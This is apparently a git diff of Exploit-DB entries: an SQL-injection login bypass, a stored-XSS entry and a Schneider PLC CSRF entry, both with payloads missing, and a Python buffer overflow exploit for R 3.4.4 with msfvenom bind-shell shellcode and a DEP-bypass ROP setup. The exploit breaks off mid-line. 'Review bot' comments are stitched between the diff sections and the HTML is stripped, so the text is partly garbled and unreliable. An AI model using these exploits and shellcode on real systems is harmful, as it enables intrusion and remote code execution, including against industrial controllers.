+ + +# POC 3 : Authentication bypass : +# Attacker can bypass admin panel without any authentication : +Path : /admin +Username : ' or 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44683.txt b/exploits/php/webapps/44683.txt new file mode 100644 index 000000000..77de3620d --- /dev/null +++ b/exploits/php/webapps/44683.txt @@ -0,0 +1,12 @@ +# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - Persistent cross site scripting +# Date: 2018-05-21 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327 +# Version: 1.5 +# Tested on: Windows + +# POC : +1) Create your account and navigate to "Edit profile" +2) Put this payload into textarea : + +3) The payload will be executed if someone opens your profile . \ No newline at end of file diff --git a/exploits/windows/webapps/44678.txt b/exploits/windows/webapps/44678.txt new file mode 100644 index 000000000..c0a03ff55 --- /dev/null +++ b/exploits/windows/webapps/44678.txt @@ -0,0 +1,103 @@ +# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery +# Date: 2018-05-12 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: http://www.schneider-electric.com/ +# Tested on: Windows +# CVE: CVE-2013-0663 +# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000 +# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx +# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100 +# Category: webapps + + + + CSRF POC + + +
+ + + + + + + + + + + + + +
+
+
Name:
+ +
+
+ +
+
& +
Pass:
+ +
+
+ +
+
+
Verify Pass:
+ +
+
+ +
+
+
+ + +
+
+
+ + + + +
+ + + \ No newline at end of file diff --git a/exploits/windows_x86/local/44680.py b/exploits/windows_x86/local/44680.py new file mode 100755 index 000000000..968ed5731 --- /dev/null +++ b/exploits/windows_x86/local/44680.py 
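Review bot: POC 3 of 44681.txt gives only the bare username `' or 0=0 #` and says nothing about the login handler behind /admin that it is injected into; name the script and the form parameter, and confirm the backend is MySQL, since `#` is a MySQL line comment and the same payload will not terminate the query on an engine that only honours `--` or `/* */`.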
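Review bot: the payloads in 44682.txt are missing from what was committed: POC 1 step 2 reads "put this payload :" followed by only `"/>`, and both CSRF sections under POC 2 ("User's CSRF exploit" and "Admin page CSRF exploit") consist of a "CSRF POC" title with no form, action URL, method or input names, so neither finding can be reproduced from the file. Restore the full XSS payload and the two HTML forms, name the profile field that stores the script for POC 1, and state which admin action the second form triggers. "Tested on: Kali linux" describes the attacker machine rather than the target; add the web server and PHP version the application ran on, and POC 3 should say which login parameter the `' or 0=0 #` string goes into.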
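Review bot: step 2 of the POC in 44683.txt ("Put this payload into textarea :") has nothing after the colon, so the entry as committed never shows what executes when someone opens the profile; add the script payload and the name of the textarea field on the "Edit profile" form. The title line reads "Persistent cross site scripting" while the commit subject lists the same entry as "Persistent Cross-Site Scripting"; align the capitalisation and hyphenation with the convention used by the other titles in this commit.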
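Review bot: the CSRF proof of concept in 44678.txt consists only of the labels Name:, Pass: and Verify Pass: (plus a stray `&`) with no form action, method or input names, so the file does not show which endpoint on the PLC web server creates or changes the account; restore the form markup. The header also needs tightening: "Version:" lists nine part numbers across the Quantum, M340 and Premium families while "Tested on: Windows" names only the attacker OS, so state which module and firmware revision was actually exercised; CVE-2013-0663 is a 2013 identifier and the entry is dated 2018-05-12, so say whether the firmware tested is still unpatched; and the path exploits/windows/webapps does not fit an embedded PLC web interface, which belongs under a hardware platform directory.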
@@ -0,0 +1,132 @@ +# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass) +# Exploit Author: Hashim Jawad +# Exploit Date: 2018-05-21 +# Vendor Homepage: https://www.r-project.org/ +# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe +# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86) +# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages' + +# Credit to bzyo for finding the bug (44516) + +#!/usr/bin/python + +import struct + +#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode +#Payload size: 718 bytes +shellcode = "" +shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" +shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" +shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70" +shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44" +shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c" +shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68" +shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f" +shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c" +shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77" +shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32" +shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c" +shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61" +shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53" +shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49" +shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61" +shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71" +shellcode += 
"\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43" +shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35" +shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61" +shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b" +shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64" +shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54" +shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a" +shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a" +shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68" +shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47" +shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c" +shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68" +shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44" +shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b" +shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59" +shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50" +shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30" +shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30" +shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50" +shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57" +shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77" +shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77" +shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f" +shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e" +shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63" +shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47" +shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32" +shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57" +shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d" +shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64" +shellcode += 
"\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56" +shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36" +shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f" +shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56" +shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d" +shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35" +shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d" +shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c" +shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75" +shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a" +shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41" + +''' +Output generated by mona.py v2.0, rev 582 - Immunity Debugger +-------------------------------------------- +Register setup for VirtualProtect() : +-------------------------------------------- + EAX = NOP (0x90909090) + ECX = lpOldProtect (ptr to W address) + EDX = NewProtect (0x40) + EBX = dwSize + ESP = lPAddress (automatic) + EBP = ReturnTo (ptr to jmp esp) + ESI = ptr to VirtualProtect() + EDI = ROP NOP (RETN) +-------------------------------------------- +''' + +rop = struct.pack('